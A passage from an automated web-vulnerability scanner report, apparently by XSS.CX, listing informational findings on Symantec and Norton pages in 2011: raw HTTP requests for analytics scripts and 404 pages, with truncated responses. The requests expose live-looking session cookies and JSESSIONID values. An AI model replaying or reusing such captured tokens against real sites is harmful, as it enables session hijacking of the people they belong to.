GET /renewals/js/s_2_code_symc_cust_prod.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 28910 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES *************...[SNIP]...
24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/symantec_omniture/mysymc_code_util.js
Request
GET /renewals/js/symantec_omniture/mysymc_code_util.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 8321 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes var countryDetails=new Array();var language=new Array();var RegionArray=new Array();var questionSet="";var pageNumber=0;var samChannel=null;var jsChannel=null;var tabNames=new Array();var subTabName...[SNIP]...
24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/symantec_omniture/s_code_20100217.js
Request
GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 30123 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /* Rainmaker changes to set the report suite. */ if (location.href.inde...[SNIP]...
24.16. http://us.norton.com/www-uat.ges.sym
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/www-uat.ges.sym
Request
GET /www-uat.ges.sym HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=21587 Date: Fri, 09 Sep 2011 21:47:29 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
Request
GET /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/ HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=1800 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
Request
GET /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/ HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=1800 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.19. http://www.symantec.com/business/verisign/fraud-detection-service
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/verisign/fraud-detection-service
Request
GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:30:49 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.